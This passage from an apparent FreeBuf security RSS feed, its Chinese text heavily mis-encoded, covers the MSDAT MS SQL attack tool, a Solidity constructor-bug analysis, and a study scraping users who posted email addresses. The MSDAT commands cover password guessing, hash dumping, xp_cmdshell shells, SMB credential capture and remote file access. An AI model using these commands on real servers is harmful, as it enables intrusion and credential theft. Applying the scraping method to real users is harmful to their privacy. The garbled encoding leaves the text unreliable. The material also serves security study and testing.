1148<pre><code>./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info</code></pre>
1149<h3>passwordguesser模å—</h3>
1150<p>这个模å—å¯ä»¥æœç´¢æœ‰æ•ˆå‡è¯ï¼š</p>
1151<pre><code>./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--force-retry –search</code></pre>
1152<p>ä½ è¿˜å¯ä»¥æŒ‡å®šå¸å·æ–‡ä»¶ï¼š</p>
1153<pre><code>./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt--force-retry</code></pre>
1154<h3>passwordstealer模å—</h3>
1155<p>导出哈希密ç :</p>
1156<pre><code>./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump--save-to-file test.txt</code></pre>
1157<h3>xpcmdshell模å—</h3>
1158<p>利用xpcmdshellæ¨¡å—æ‰§è¡Œç³»ç»Ÿå‘½ä»¤ï¼š</p>
1159<pre><code>./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –shell</code></pre>
1160<p>如果没有å¯ç”¨xpcmdshellçš„è¯ï¼Œä½ å¯ä»¥åˆ©ç”¨â€œ–enable-xpcmdshellâ€œæ¥æ¿€æ´»æ¨¡å—:</p>
1161<h3>./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –enable-xpcmdshell–disable-xpcmdshell –disable-xpcmdshell –shell</h3>
1162<h3>smbauthcapture模å—</h3>
1163<p>获å–SMBå‡è¯ï¼š</p>
1164<pre><code>./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture$MY_IP_ADDRESS --share-name SHARE</code></pre>
1165<p>ä½ è¿˜å¯ä»¥é…åˆMetasploitçš„auxiliary/server/capture/smb模å—一起使用:</p>
1166</p>
1167<pre><code>msf> use auxiliary/server/capture/smb
1168msfauxiliary(smb) > exploit</code></pre>
1169</p>
1170<h3>oleautomation模å—</h3>
1171<p>这个模å—å¯ä»¥è¯»å†™æ•°æ®åº“æœåС噍ä¸å˜å‚¨çš„æ–‡ä»¶ï¼š</p>
1172<pre><code>./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--read-file 'C:\Users\Administrator\Desktop\temp.txt'</code></pre>
1173<p>å‘ç›®æ ‡æ–‡ä»¶è¿œç¨‹å†™å…¥å—符串:</p>
1174<pre><code>./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'</code></pre>
1175<p>文件下载:</p>
1176<pre><code>./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file'C:\Users\Administrator\Desktop\temp.txt' temp.txt</code></pre>
1177<p>æ–‡ä»¶ä¸Šä¼ ï¼š</p>
1178<pre><code>./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-filetemp.txt 'C:\Users\Administrator\Desktop\temp.txt</code></pre>
1179<h2>å…¶ä»–</h2>
1180<p>如需了解完整的模å—使用方法,请直接访问MSDATçš„ã€<a href="https://github.com/quentinhardy/msdat">GitHub主页</a>】以获å–详细信æ¯ã€‚</p>
1181<p><b style="color: rgb(159, 163, 168);">*å‚è€ƒæ¥æºï¼š<a href="https://github.com/quentinhardy/msdat">msdat</a>,FBå°ç¼–Alpha_h4ck编译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1182]]></content:encoded>
1183 <wfw:commentRss>http://www.freebuf.com/sectool/177187.html/feed</wfw:commentRss>
1184 <slash:comments>1</slash:comments>
1185 </item>
1186 <item>
1187 <title>æž„é€ å‡½æ•°ç¼ºå¤±æ¼æ´žåˆ†æž</title>
1188 <link>http://www.freebuf.com/vuls/178574.html</link>
1189 <comments>http://www.freebuf.com/vuls/178574.html#comments</comments>
1190 <pubDate>Wed, 25 Jul 2018 06:00:26 +0000</pubDate>
1191 <dc:creator>BUGX</dc:creator>
1192 <category><![CDATA[区å—链安全]]></category>
1193 <category><![CDATA[æ¼æ´ž]]></category>
1194 <category><![CDATA[以太åŠ]]></category>
1195 <category><![CDATA[函数]]></category>
1196
1197 <guid isPermaLink="false">http://www.freebuf.com/?p=178574</guid>
1198 <description><![CDATA[一ã€å‰è¨€ æž„é€ å‡½æ•°ç¼ºå¤±æ¼æ´žè‡ªæ™ºèƒ½åˆçº¦äº§ç”Ÿä»¥æ¥å°±ä¸€ç›´å‡ºçŽ°ï¼Œå½’æ ¹åˆ°åº•æ˜¯ç”±äºŽæ–°è¿›å¼€å‘者对 solidity 代ç 结构ä¸ç†Ÿæ‚‰é€ æˆçš„。BUGX.IO团队本次就æ¥ä»‹ç»ä¸€ä¸‹æ¼æ´žçš„基本原ç†ã€è¡¨çް形å¼ä»¥åŠå¯¹å¼€å‘者的建议。 äºŒã€æ¼æ´žåŽŸç† 1. ä»€ä¹ˆæ˜¯æž„é€ å‡½æ•° Solidity编写åˆçº¦å’Œé¢å‘对象编程è¯è¨€éžå¸¸ç›¸ä¼¼ï¼Œæˆ‘们å¯ä»¥é€šè¿‡æž„é€ å‡½æ•°ï¼ˆconstructor)æ¥åˆå§‹åŒ–åˆçº¦å¯¹è±¡ã€‚æž„é€ å‡½æ•°å°±æ˜¯æ–¹æ³•åå’Œåˆçº¦åå—相åŒçš„函数,创建åˆçº¦æ—¶ä¼šè°ƒç”¨æž„é€ å‡½æ•°å¯¹çŠ¶æ€å˜é‡è¿›è¡Œæ•°æ®åˆå§‹åŒ–æ“作。 æž„é€ å‡½æ•°å¯ç”¨çš„函数类型为 public 或 internal,如果有 payable 修饰,就åªèƒ½æ˜¯ public 类型。而大部分人的写法都是 public 或者ä¸å†™ã€‚ä¸å†™ç±»åž‹åˆ™ç”±å‡½æ•°å¯è§æ€§é»˜è®¤ä¸º public ç±»åž‹ã€‚åŒæ—¶ï¼Œå¦‚æžœæž„é€ å‡½æ•°å¸¦å‚æ•°ï¼Œåˆ™ä¸€å®šè¦æ”¾åœ¨åˆçº¦ä¸‹çš„第一个函数。 pragma solidity 0.4.21;contract Foo {  function Foo() public {    // ...  }} åˆçº¦ç»“构的规范化写作å¯ä»¥è®©å…¶ä»–人更好地阅读,并且 constructor å’Œ fallback å‡½æ•°è¦æ”¾åœ¨å‰é¢ä»¥ä¾¿æ›´å¥½åœ°æŸ¥çœ‹ã€‚官方建议以如下顺åºå†™ä½œï¼š * constructor * fallback function (if exists) * external * public * internal * private åˆçº¦ç»“构的规范写法如下: contract A { constructor() public { ... } function() external { ... } // External functions // ... // External functions that are view // ... // External functions that are pure // ... // Public functions // ... // Internal functions // ... // Private functions // ... } 2. æž„é€ å‡½æ•°ç¼ºå¤±ä¸Žå±å®³ æž„é€ å‡½æ•°ç¼ºå¤±åˆ™æ˜¯ç”±äºŽæž„é€ å‡½æ•°ä¸Žåˆçº¦åå—ä¸åŒï¼Œè€Œåˆä¸º […]]]></description>
1199 <content:encoded><![CDATA[<h2><b>一ã€å‰è¨€</b></h2>
1200<p style="text-align: justify;"><b style="color: rgb(0, 176, 80);">æž„é€ å‡½æ•°ç¼ºå¤±æ¼æ´žè‡ªæ™ºèƒ½åˆçº¦äº§ç”Ÿä»¥æ¥å°±ä¸€ç›´å‡ºçŽ°ï¼Œå½’æ ¹åˆ°åº•æ˜¯ç”±äºŽæ–°è¿›å¼€å‘者对 solidity 代ç 结构ä¸ç†Ÿæ‚‰é€ æˆçš„。BUGX.IO团队本次就æ¥ä»‹ç»ä¸€ä¸‹æ¼æ´žçš„基本原ç†ã€è¡¨çް形å¼ä»¥åŠå¯¹å¼€å‘者的建议。</b></p>
1201<h2><b style=""><span style="color: rgb(51, 51, 51);">äºŒã€æ¼æ´žåŽŸç†</span></b></h2>
1202<h3><strong style="color: rgb(0, 112, 192);">1. ä»€ä¹ˆæ˜¯æž„é€ å‡½æ•°</strong></h3>
1203<p style="text-align: justify;">Solidity编写åˆçº¦å’Œé¢å‘对象编程è¯è¨€éžå¸¸ç›¸ä¼¼ï¼Œæˆ‘们å¯ä»¥é€šè¿‡æž„é€ å‡½æ•°ï¼ˆconstructor)æ¥åˆå§‹åŒ–åˆçº¦å¯¹è±¡ã€‚æž„é€ å‡½æ•°å°±æ˜¯æ–¹æ³•åå’Œåˆçº¦åå—相åŒçš„函数,创建åˆçº¦æ—¶ä¼šè°ƒç”¨æž„é€ å‡½æ•°å¯¹çŠ¶æ€å˜é‡è¿›è¡Œæ•°æ®åˆå§‹åŒ–æ“作。</p>
1204<p><img alt="图片1.png" src="http://image.3001.net/images/20180724/15324144179270.png!small" width="690" height="114"></p>
1205<p style="text-align: justify;">æž„é€ å‡½æ•°å¯ç”¨çš„函数类型为 public 或 internal,如果有 payable 修饰,就åªèƒ½æ˜¯ public 类型。而大部分人的写法都是 public 或者ä¸å†™ã€‚ä¸å†™ç±»åž‹åˆ™ç”±å‡½æ•°å¯è§æ€§é»˜è®¤ä¸º public ç±»åž‹ã€‚åŒæ—¶ï¼Œå¦‚æžœæž„é€ å‡½æ•°å¸¦å‚æ•°ï¼Œåˆ™ä¸€å®šè¦æ”¾åœ¨åˆçº¦ä¸‹çš„第一个函数。</p>
1206</p>
1207<pre><code><p>pragma solidity 0.4.21;</p><p>contract Foo {</p><p> function Foo() public {</p><p> // ...</p><p> }</p><p>}</p></code></pre>
1208<p style="text-align: justify;">åˆçº¦ç»“构的规范化写作å¯ä»¥è®©å…¶ä»–人更好地阅读,并且 constructor å’Œ fallback å‡½æ•°è¦æ”¾åœ¨å‰é¢ä»¥ä¾¿æ›´å¥½åœ°æŸ¥çœ‹ã€‚官方建议以如下顺åºå†™ä½œï¼š</p>
1209<p style="text-align: justify;">* constructor</p>
1210<p style="text-align: justify;">* fallback function (if exists)</p>
1211<p style="text-align: justify;">* external</p>
1212<p style="text-align: justify;">* public</p>
1213<p style="text-align: justify;">* internal</p>
1214<p style="text-align: justify;">* private</p>
1215<p style="text-align: justify;">åˆçº¦ç»“构的规范写法如下:</p>
1216<pre><code>contract A {
1217 constructor() public {
1218 ...
1219 }
1220
1221 function() external {
1222 ...
1223 }
1224
1225 // External functions
1226 // ...
1227
1228 // External functions that are view
1229 // ...
1230
1231 // External functions that are pure
1232 // ...
1233
1234 // Public functions
1235 // ...
1236
1237 // Internal functions
1238 // ...
1239
1240 // Private functions
1241 // ...
1242}<br /></code></pre>
1243<h3><strong>2. æž„é€ å‡½æ•°ç¼ºå¤±ä¸Žå±å®³</strong></h3>
1244<p style="text-align: justify;">æž„é€ å‡½æ•°ç¼ºå¤±åˆ™æ˜¯ç”±äºŽæž„é€ å‡½æ•°ä¸Žåˆçº¦åå—ä¸åŒï¼Œè€Œåˆä¸º public ç±»åž‹ï¼Œå°±å˜æˆäº†ä¸€ä¸ªå…¬æœ‰å‡½æ•°äº†ï¼Œå¯ä»¥è¢«ä»»ä½•äººè°ƒç”¨ï¼Œä¸€èˆ¬å‡½æ•°å‡½æ•°æ¯”è¾ƒæ•æ„Ÿï¼Œç”¨äºŽåˆå§‹åŒ–åˆçº¦æ—¶å®šä¹‰é€šè¯æ•°é‡ã€ç®¡ç†å‘˜åœ°å€ç‰åŸºæœ¬å˜é‡çжæ€ï¼Œä¸€æ—¶å˜æˆäº†å…¬æœ‰å‡½æ•°ï¼Œå±å®³å¯æƒ³è€ŒçŸ¥ï¼Œæƒé™æŽ§åˆ¶ã€é€šè¯ç®¡ç†åŸºæœ¬å…¨çº¿å¥”溃。</p>
1245<h3><strong>3. 版本å‡çº§åŽæž„é€ å‡½æ•°çš„å˜åŒ–</strong></h3>
1246<p style="text-align: justify;">从 `0.4.22`版本开始,solidity 编译器引入了 constructors 关键å—,以替代低版本的将åˆçº¦åä½œä¸ºæž„é€ å‡½æ•°åçš„è¯æ³•,é¿å…程åºå‘˜å®¹æ˜“出现的编ç 错误。使用旧写法会出现 warning ä¿¡æ¯ã€‚</p>
1247<p style="text-align: justify;">新版本写法为:</p>
1248<pre><code>contract Ownable {
1249 address public owner;
1250 address public admin;
1251
1252 constructor() public {
1253 owner = msg.sender;
1254 admin = msg.sender;
1255 }
1256
1257 // Other code
1258}<br /></code></pre>
1259<h2 style="text-align: justify;"><strong style=""><b style="color: rgb(51, 51, 51);">三ã€å¸¸è§æ¼æ´žä»£ç å½¢å¼</b></strong></h2>
1260<h3><strong style="">1. æž„é€ å‡½æ•°ä½¿ç”¨åº“åˆçº¦åç§°ï¼Œä½¿å¾—æž„é€ å‡½æ•°å˜æˆäº†å…¬æœ‰å‡½æ•°ï¼Œå¯è¢«ä»»æ„调用。</strong></h3>
1261<p style="text-align: justify;">我们å‘现了ä¸å°‘è¿™ç§é”™è¯¯å†™æ³•çš„åˆçº¦ï¼Œåœ¨ä¸»åˆçº¦ä¸ï¼Œæž„é€ å‡½æ•°å†™æˆäº† Token() 或 ERC20Token() ã€‚è¿™æ ·åçš„å‡½æ•°éžæž„é€ å‡½æ•°ï¼Œå˜æˆäº†æ™®é€šå‡½æ•°äº†ã€‚</p>
1262<p style="text-align: justify;">如 DealGuard åˆçº¦ï¼š </p>
1263<p style="text-align: justify;"><a href="https://etherscan.io//address/0xb47c5e8f389dc1fa8247c9a4b9e5dcdc79754152#code" ref="">https://etherscan.io//address/0xb47c5e8f389dc1fa8247c9a4b9e5dcdc79754152#code</a></p>
1264<p style="text-align: justify;"><img alt="2.png" src="http://image.3001.net/images/20180724/15324150224025.png!small" width="690" height="388"></p>
1265<h3><strong>2. åˆçº¦åä¸Žæž„é€ å‡½æ•°åä¸åŒï¼Œå¦‚大å°å†™ä¸åŒã€æ‹¼å†™é”™è¯¯ç‰ï¼Œä½¿å¾—æž„é€ å‡½æ•°å˜æˆäº†å…¬æœ‰å‡½æ•°ï¼Œå¯è¢«ä»»æ„人调用。</strong></h3>
1266<p style="text-align: justify;">åªèƒ½è¯´å¼€å‘者太大æ„,对智能åˆçº¦å¼€å‘有什么误解å§ã€‚ç»å¸¸çœ‹åˆ°çš„æ¼æ´žå½¢å¼æ˜¯åˆçº¦åä¸Žæž„é€ å‡½æ•°ä¸åŒï¼Œåªä¸Ž name å˜é‡å相åŒï¼Œä¼°è®¡æ˜¯å¼€å‘者以为åˆçº¦å相åŒå°±è¡Œäº†ï¼Œå´å¿½ç•¥äº†æž„é€ å‡½æ•°ã€‚</p>
1267<p style="text-align: justify;">如 ReaperCoin11 åˆçº¦ï¼š </p>
1268<p style="text-align: justify;"><a href="https://etherscan.io//address/0x1b7cd071187ec0b2995b96ee82296cfa639572f1#code">https://etherscan.io//address/0x1b7cd071187ec0b2995b96ee82296cfa639572f1#code</a></p>
1269<p style="text-align: justify;"><img alt="3.png" src="http://image.3001.net/images/20180724/15324150522639.png!small" width="690" height="233">还有这个 Krypticoin åˆçº¦ï¼Œä¹ä¸€çœ‹çœ‹ä¸å‡ºæ¥ï¼Œä»”细瞅瞅,å†ä»”ç»†çž…çž…ï¼ŒåŽŸæ¥ coin 拼错了 。</p>
1270<p style="text-align: justify;"><img alt="4 .png" src="http://image.3001.net/images/20180724/15324150726615.png!small" width="690" height="295"></p>
1271<p style="text-align: justify;">之å‰çŸ¥é“创宇å‘布了关于 `owned`大å°å†™ç¼–ç æ¼æ´žçš„æ–‡ç« ã€‚åŒæ—¶ï¼Œæˆ‘们也å¯ä»¥æ‰¾ä¸€äº›ç±»ä¼¼çš„容易大å°å†™é”™è¯¯çš„库åˆçº¦ï¼Œå¦‚ `ownable`。ä¸è¿‡ç»è¿‡æˆ‘们的分æžï¼Œè¿˜æ˜¯ä»¥ owned 大å°å†™é”™è¯¯ä¸ºä¸»ã€‚</p>
1272<p>如 MORPH åˆçº¦ï¼š</p>
1273<p><a href="https://etherscan.io//address/0x2ef27bf41236bd859a95209e17a43fbd26851f92#code">https://etherscan.io//address/0x2ef27bf41236bd859a95209e17a43fbd26851f92#code</a></p>
1274<pre><code>contract Owned {
1275 address public owner;
1276
1277 function owned() public {
1278 owner = msg.sender;
1279 }<br /></code></pre>
1280<h3><strong>3. constructor å‰åŠ äº†function ï¼Œæˆ–è€…åŠ äº† fucntion ç„¶åŽå¼€å¤´çš„ C写æˆäº†å¤§å†™ï¼Œå³ `function Constructor()public {}`ï¼Œä½¿å¾—æž„é€ å‡½æ•°å˜æˆäº†å…¬æœ‰å‡½æ•°ï¼Œå¯è¢«ä»»æ„人调用。</strong></h3>
1281<p style="text-align: justify;">版本å‡çº§åŽçš„æž„é€ å‡½æ•°åªéœ€è¦å•独使用 constructor å³å¯ï¼Œä½†å¾ˆå¤šå¼€å‘者å´å¿½ç•¥äº†æ¤ç»†èŠ‚ã€‚ä¸Šé¢è¿™ä¸ªå†™æ³•错误在于两点:</p>
1282<p style="text-align: justify;"><b>1) åŠ å…¥äº† function å˜æˆäº†æ™®é€šå‡½æ•°å½¢å¼ã€‚但是这时编辑器ä¸ä¼šæŠ¥ warning ä¿¡æ¯ï¼š</b></p>
1283<p style="text-align: justify;"><img alt="5.png" src="http://image.3001.net/images/20180724/15324151179429.png!small" width="690" height="102"></p>
1284<p style="text-align: justify;">但是有开å‘者忽了æ¤è¦å‘Šï¼Œå†™å‡ºäº†é”™è¯¯ä»£ç 。</p>
1285<p style="text-align: justify;">如 MDOT åˆçº¦ï¼š </p>
1286<p style="text-align: justify;"><a href="https://etherscan.io//address/0xef7d906fd1c0eb5234df32f40c6a1cb0328d7279#code">https://etherscan.io//address/0xef7d906fd1c0eb5234df32f40c6a1cb0328d7279#code</a></p>
1287<pre><code> function constructor() public {
1288 totalSupply = 5000000000000; // Set the total supply (in base units)
1289 balances[0xbfC729007CE9CBBE54132Fb9BFa097D80AAC791C] = 5000000000000; // Initially assign the entire supply to the specified account
1290 }<br /></code></pre>
1291<p style="text-align: justify;"><b>2) 但是如果将 `constructor`错写æˆäº† `Constructor`,使得编辑器识别其为普通函数å,没有任何 warning ä¿¡æ¯ã€‚</b></p>
1292<p style="text-align: justify;"><img alt="21.png" src="http://image.3001.net/images/20180724/15324152268008.png!small" width="228" height="38"></p>
1293<p style="text-align: justify;">如 TOGToken åˆçº¦ï¼š </p>
1294<p style="text-align: justify;"><a href="https://etherscan.io//address/0xb9d5c2548266428795fd8b1f12aedbdeb417fe54#code">https://etherscan.io//address/0xb9d5c2548266428795fd8b1f12aedbdeb417fe54#code</a></p>
1295<p><img alt="6.png" src="http://image.3001.net/images/20180724/15324152748498.png!small" width="690" height="285"></p>
1296<h2><strong style=""><b style=""><span style="color: rgb(51, 51, 51);">å››ã€å¸¸è§æ¼æ´žä»£ç å½¢å¼</span></b></strong></h2>
1297<p>使用新版本写法,并且检查å¥å¼ã€æ‹¼å†™çš„æ£ç¡®æ€§ã€‚</p>
1298<h2><strong style=""><b style=""><span style="color: rgb(51, 51, 51);">äº”ã€æ¼æ´žå½±å“范围</span></b></strong><br /></h2>
1299<p>通过我们对以太åŠä¸Šçš„åˆçº¦è¿›è¡Œæ•´ä½“监测,å‘çŽ°æœ‰æ¤æ¼æ´žçš„竟达两åƒå¤šä»½ï¼Œå¤§å°å†™ç¼–ç 错误的约有20 份。其ä¸ä¸ä¹æ£åœ¨ä½¿ç”¨ä¸çš„åˆçº¦ã€‚</p>
1300<h2><img alt="7.png" src="http://image.3001.net/images/20180724/15324153895084.png!small" width="690" height="571"><strong style=""><b style=""><span style="color: rgb(51, 51, 51);">å…ã€èµ„æ–™</span></b></strong><br /></h2>
1301<p style="text-align: justify;"><a href="https://solidity.readthedocs.io/en/latest/contracts.html?highlight=constructor#creating-contracts">https://solidity.readthedocs.io/en/latest/contracts.html?highlight=constructor#creating-contracts</a></p>
1302<p style="text-align: justify;"><a href="https://solidity.readthedocs.io/en/latest/style-guide.html?highlight=constructor#order-of-functions">https://solidity.readthedocs.io/en/latest/style-guide.html?highlight=constructor#order-of-functions</a></p>
1303<p style="text-align: justify;"><a href="https://ethereum.stackexchange.com/questions/30223/should-the-constructor-function-be-public">https://ethereum.stackexchange.com/questions/30223/should-the-constructor-function-be-public</a></p>
1304<p style="text-align: justify;"><a href="http://solidity.readthedocs.io/en/develop/contracts.html?highlight=private#visibility-and-getters">http://solidity.readthedocs.io/en/develop/contracts.html?highlight=private#visibility-and-getters</a></p>
1305<h2><span style="color: rgb(51, 51, 51);">七ã€å…¬å¸ä»‹ç» </span> <br /></h2>
1306<p style="text-align: justify;">BUGX.IO是一家致力于区å—链领域的安全公å¸ã€‚æ ¸å¿ƒå›¢é˜Ÿç»„å»ºäºŽ2014年,我们在区å—链生æ€å®‰å…¨ã€è¡Œä¸šè§£å†³æ–¹æ¡ˆã€å®‰å…¨å»ºè®¾ã€çº¢è“å¯¹æŠ—ç‰æ–¹é¢æœ‰æ·±åŽšç§¯ç´¯ä¸Žè¿‡ç¡¬ä¸“ä¸šç´ å…»ã€‚ </p>
1307<p><b style="color: rgb(159, 163, 168);">*本文作者BUGX.IO-Tri0nes,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1308]]></content:encoded>
1309 <wfw:commentRss>http://www.freebuf.com/vuls/178574.html/feed</wfw:commentRss>
1310 <slash:comments>4</slash:comments>
1311 </item>
1312 <item>
1313 <title>以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž</title>
1314 <link>http://www.freebuf.com/articles/neopoints/178013.html</link>
1315 <comments>http://www.freebuf.com/articles/neopoints/178013.html#comments</comments>
1316 <pubDate>Wed, 25 Jul 2018 05:40:30 +0000</pubDate>
1317 <dc:creator>䏿œ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰</dc:creator>
1318 <category><![CDATA[观点]]></category>
1319 <category><![CDATA[主动泄露]]></category>
1320 <category><![CDATA[百度贴å§]]></category>
1321 <category><![CDATA[社交网络]]></category>
1322 <category><![CDATA[éšç§æ³„露]]></category>
1323
1324 <guid isPermaLink="false">http://www.freebuf.com/?p=178013</guid>
1325 <description><![CDATA[*æœ¬æ–‡ä½œè€…ï¼šä¸æœ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰ï¼Œæœ¬æ–‡å±ž FreeBuf 原创奖励计划,未ç»è®¸å¯ç¦æ¢è½¬è½½ã€‚ 楼主:我有æ»ä¾2资æºï¼Œè¦çš„ç•™é‚®ç®±ï¼ åƒç“œçš„æˆ‘:楼主好人一生平安~01010101@qq.com,谢谢。 æŸä¸ªé—²çš„æ— èŠçš„人:  site:tieba.baidu.com 01010101@qq.com  本文主è¦ä»¥ç™¾åº¦è´´å§å’Œå¾®åšä¸ºä¾‹ï¼Œåˆ†æžæŽ¢è®¨ç¤¾äº¤ç½‘络上的éšç§ä¸»åŠ¨æ³„éœ²çŽ°è±¡ã€‚ 一ã€ä¸»è¦æ€è·¯ 如果是针对个体用户,比如已知个人信æ¯ï¼Œä¸”这个信æ¯å¯ä»¥ä¸Žå…¶ç¤¾äº¤ç½‘络ä¸çš„æŸè´¦æˆ·å½¢æˆå•射关系。那么利用信æ¯Xæž„é€ payload,直接使用百度的siteè¯æ³•å¯¹ç›®æ ‡SNS进行检索å³å¯ã€‚ æ¤æ—¶ä¸ä¸€å®šèƒ½å¤ŸèŽ·å–足够的数æ®ï¼Œå› 为å•ä¸€ç›®æ ‡æ˜¯å¦æ›¾æ³„露éšç§æ˜¯ä¸€ä¸ªæœªçŸ¥æ•°ï¼Œå…¶SNSä½¿ç”¨æ·±åº¦ä¹Ÿæ˜¯æœªçŸ¥æ•°ã€‚å› æ¤ï¼Œæ”¹ä½¿ç”¨æ•感信æ¯çš„通é…体进行检索,先获å–用户集åˆï¼Œå†èŽ·å–å‘言情况。具体æµç¨‹å¦‚下: 二ã€é’ˆå¯¹å•一用户的工具实现 å› ä¸ºä»£ç æ°´å¹³å¤ªå·®æˆ‘就䏿”¾github了,emmmm其实就是简å•的爬虫,具体的架构如下: éƒ¨åˆ†æ ¸å¿ƒåŠŸèƒ½ä»£ç åŠæ³¨é‡Šå¦‚下: 那么完æˆçš„æ•ˆæžœå°±æ˜¯ï¼Œè¾“å…¥æŸä¸€ä¸ªä¿¡æ¯ï¼Œå®ƒè¿”å›žç»™ä½ æŒ‡å®šç¤¾äº¤ç½‘ç»œä¸ä¸Žå…¶ç›¸å…³çš„ç”¨æˆ·ã€‚ä½ ç¡®å®šç”¨æˆ·å,它继ç»çˆ¬å–该用户的所有å‘言记录。以åŽç¿»ä¸œè¥¿å†ä¹Ÿä¸ç”¨è‡ªå·±æ…¢æ…¢æ‰¾äº†~ å¦å¤–由于比较懒,åªåšäº†è´´å§åŠå¾®åšä¸¤ä¸ªSNS ä¸‰ã€æ€è·¯æŽ¨å¹¿ï¼Œå³èŽ·å–大釿•°æ®çš„æ–¹æ³• 说起æ¥éº»çƒ¦ï¼Œå…¶å®žå°±æ˜¯ç®€å•替æ¢äº†ä¸ªpayload,ä¸å†å±€é™äºŽçœ‹æŸä¸ªäººï¼Œè€Œæ˜¯ummmä½ ä»¬è¿™äº›ç•™è¿‡é‚®ç®±çš„éƒ½ç»™æˆ‘è¿‡æ¥ã€‚最åŽå¦‚上图所说,拿了个23MB的文本。 ç”±äºŽæœ‰å¤§é‡æ£åˆ™æ“ä½œï¼Œçˆ¬è™«è·‘çš„å¾ˆæ…¢ï¼Œåœ¨äº‘ä¸Šè·‘äº†æœ‰ä¸ªå››äº”å¤©æ‰æŠŠè¿™ä¸ƒåƒå¤šä¸ªç”¨æˆ·è·‘å®Œã€‚åŠ äº†å¤šçº¿ç¨‹ä½†æ˜¯ä¼¼ä¹Žæ²¡æœ‰ä»€ä¹ˆæ”¹å–„ï¼Ÿ å››ã€æ–‡æœ¬è¯æ–™å¤„ç† 4.1 è¯æ–™é¢„处ç†åŠåŽç»æ“作 æ¤æ—¶æ‰‹é‡Œæœ‰ä¸€å¤§æ‰¹ä¸»åŠ¨æ³„éœ²ä¸ªäººéšç§çš„用户å‘言,那当然è¦åˆ†æžä¸€æ³¢ã€‚分æžå‰ï¼Œå…ˆæ´—ä¸€æ³¢è¯æ–™ï¼Œä¹‹åŽåˆ†è¯åŠ å‘é‡åŒ–ã€‚å…·ä½“ä¸»è¦æ¥éª¤å¦‚下: 去åœç”¨è¯æœ‰ç”¨æ£åˆ™æœ‰ç”¨ç»“巴,具体åœç”¨è¯åº“æ˜¯å‡ ä¸ªé™¢æ ¡çš„åˆè®¢ç‰ˆã€‚å‘é‡åŒ–直接word2vec,其实SNSå‘言包å«å¤§é‡çš„çŸè¯å’ŒçŸå¯¹è¯ï¼Œä½¿ç”¨æ–‡æœ¬å‘é‡å¯èƒ½æ›´å¥½ï¼Œä½†ç¬”者技术有é™ä¹Ÿæ¯”较懒,直接分è¯ç”¨è¯å‘é‡åšäº†ã€‚ 4.2 对照组选择 对照组的选择其实比较麻烦,按æ£å¸¸æ¥è¯´ï¼Œæ¤æ—¶èŽ·å¾—çš„æ˜¯ä¸»åŠ¨æ³„éœ²éšç§çš„ä¸å®‰å…¨ç”¨æˆ·çš„å‘è¨€ï¼Œä½ å¯¹ç…§è¯¥é€‰ä¸ªå®‰å…¨ç”¨æˆ·ã€‚å¯å®‰å…¨ç”¨æˆ·å¤ªéš¾ç•Œå®šäº†ï¼Œå³æˆ‘找到一æ¡ä½ 留有个人éšç§çš„å‘è¨€ä½ å°±æ˜¯ä¸å®‰å…¨çš„,å¯ä½ è¦æ‰€æœ‰å‘è¨€éƒ½æ²¡æœ‰é—®é¢˜æ‰æ˜¯å®‰å…¨çš„。这里å·å·¥å‡æ–™é€‰ç”¨2012å¹´ccf的微åšåˆ†æžæ–‡æœ¬ã€‚é•¿è¿™ä¸ªæ ·å: 4.3 å¯è§†åŒ–结果 其实å‘é‡åŒ–过程ä¸ï¼Œåˆå§‹æ˜¯3M+个300ç»´å‘é‡ï¼Œç„¶åŽé™ç»´åˆ°äºŒç»´çš„è¯ï¼Œæˆ‘çš„å°ç ´æœ¬æœ‰ç‚¹è·‘ä¸åŠ¨ï¼Œå°±åœ¨åˆ†è¯é˜¶æ®µæŒ‰ç…§æƒé‡å…ˆåšäº†ä¸ªç›é€‰ã€‚对更具有代表性的若干个å‘é‡è¿›è¡Œäº†é™ç»´ã€‚如下图所示,这是å‰ä¸‰æ¬¡ï¼š å¯ä»¥çœ‹åˆ°è“è‰²å¯¹ç…§ç»„ï¼Œæ¤æ—¶å˜åœ¨å°è§„模的èšç±»æƒ…况,这是由于对照组文本本身具有一定的è¯é¢˜æ€§ã€‚ 而当æƒé‡ä¸ºTop20k时,对照情况如下: 与之å‰ä¸‰æ¬¡å®žéªŒæœ‰æ‰€ä¸åŒï¼Œéšç€è€ƒè™‘范围的扩大,对照组的å°è§„模èšç±»æƒ…å†µä¹Ÿé€æ¸æ¶ˆå¤±ã€‚两组å‘é‡åˆ†å¸ƒèŒƒå›´æŽ¥è¿‘ï¼Œæ— æ˜Žæ˜¾å·®å¼‚ã€‚æ¤æ—¶è¯æ˜Žï¼ŒSNSéšç§æ‚–论导致的泄露éšç§ç”¨æˆ·ï¼Œåœ¨å‘è¨€ä¸Šä¸Žä¸€èˆ¬ç”¨æˆ·æ— æ˜Žæ˜¾å·®å¼‚ï¼Œå‘è¨€æ— æ˜Žæ˜¾èšç±»ã€‚å³é€šè¿‡å‘è¨€åˆ¤æ–æŸç”¨æˆ·æ˜¯å¦å˜åœ¨å®‰å…¨éšæ‚£ï¼Œä¸å¯è¡Œã€‚ 